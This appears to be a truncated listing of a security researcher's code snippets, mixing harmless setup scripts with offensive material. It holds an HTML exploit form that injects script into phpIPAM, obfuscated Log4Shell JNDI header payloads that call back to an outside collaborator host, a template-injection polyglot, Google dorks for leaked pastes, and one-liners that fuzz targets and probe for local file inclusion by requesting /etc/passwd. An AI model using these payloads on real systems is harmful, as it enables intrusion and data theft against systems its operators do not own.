incogbyte

#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to 
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt

filename="$1"
while read -r line; do
    name="$line"

incogbyte

Convert Debian 10 to Kali Linux on Google Cloud or Any Debian

After you create an account on Google Cloud, and create your VPS using Debian 10, follow the below guide to convert your Debian to Kali Linux Latest Version:

Convert Debian to Kali:

Step 1:

apt-get update -y && apt-get full-upgrade -y && apt-get dist-upgrade -y && apt autoremove -y && apt autoclean

incogbyte

POST /wp-admin/admin.php?page=hugeit_slider HTTP/1.1
Host: localhost:8000
Content-Length: 53
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000

incogbyte

<html>
  <body>
    <h1> Exploit PHPIPAM </h1>
    <p><strong> By: Incogbyte </strong></p>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
      <input type="hidden" name="container" value="body" />
      <input type="hidden" name="placement" value="top" />
      <input type="hidden" name="sectionid" value="2&apos;&gt;&lt;input&#32;onpointerleave&#61;&quot;alert&#40;1&#41;&quot;&gt;incogbyte&lt;&#47;input&gt;&lt;script&gt;alert&#40;&apos;incogbyte&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="original&#45;title" value="Search&#32;for&#32;free&#32;subnets&#32;in&#32;section&#32;" />

incogbyte

        User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
        
        User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
        X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}

incogbyte

import os
import sys
import base64

'''

Small script to generate base64 passwords like, YWRtaW46YWRtaW4= 


usage

incogbyte

#!/bin/bash

sudo apt install fontconfig
cd ~
wget https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip
mkdir -p .local/share/fonts
unzip Meslo.zip -d .local/share/fonts
cd .local/share/fonts
rm *Windows*
cd ~

incogbyte

${{<%[%'"}}%\.vult00

incogbyte

"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com |  site:jsfiddle.net | site:trello.com | site:.attlasian.net "target" "

incogbyte

• FFUF fuzzing paths + Domains
  • assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

---

• LFI testing
  • gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

---